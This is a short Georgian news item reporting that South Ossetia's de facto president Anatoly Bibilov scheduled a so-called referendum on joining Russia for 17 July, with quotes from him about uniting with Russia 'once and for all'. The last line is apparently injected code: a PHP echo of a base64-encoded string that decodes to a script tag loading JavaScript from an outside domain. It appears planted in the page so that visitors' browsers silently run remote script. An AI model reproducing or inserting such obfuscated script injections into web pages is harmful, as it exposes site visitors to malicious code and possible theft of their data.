celsiusi
ავერსი საქკაბელი
ოკუპირებული ე.წ. სამხრეთ ოსეთის მოქმედმა დე ფაქტო პრეზიდენტმა, ანატოლი ბიბილოვმა რუსეთთან შეერთების ე.წ. რეფერენდუმი 17 ივლისს დანიშნა. ინფორმაციას ადგილობრივი მედია ავრცელებს.
 
ბიბილოვის თქმით, მალე "დიდი ოცნება" ახდება, რადგან სამხრეთ ოსეთი და რუსეთი "დაკავშირებულია ერთი ისტორიით" და მოვიდა დრო, "ერთხელ და სამუდამოდ" გაერთიანდნენ.
 
„შესაბამისი დოკუმენტები სასამართლოს გადაეცა. ველოდებით სასამართლოს გადაწყვეტილებას და უახლოეს დროში, მალე ახდება ჩვენი დიდი ოცნება. რუსეთი და სამხრეთ ოსეთი დაკავშირებულია ერთი ისტორიით. ეს არ არის მხოლოდ პარტნიორობა და მეგობრობა. ეს უფრო ორი ძმის ურთიერთობაა, როდესაც უფროსი ძმა ყოველთვის გაგიგებს და მხარს დაგიჭერს, უმცროსი კი - პატივს სცემს და დაეხმარება უფროსს. მოვიდა დრო, გავერთიანდეთ ერთხელ და სამუდამოდ. ეს ნიშნავს ახალი ისტორიის დასაწყისს“, - თქვა მან. 
 
 
792
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");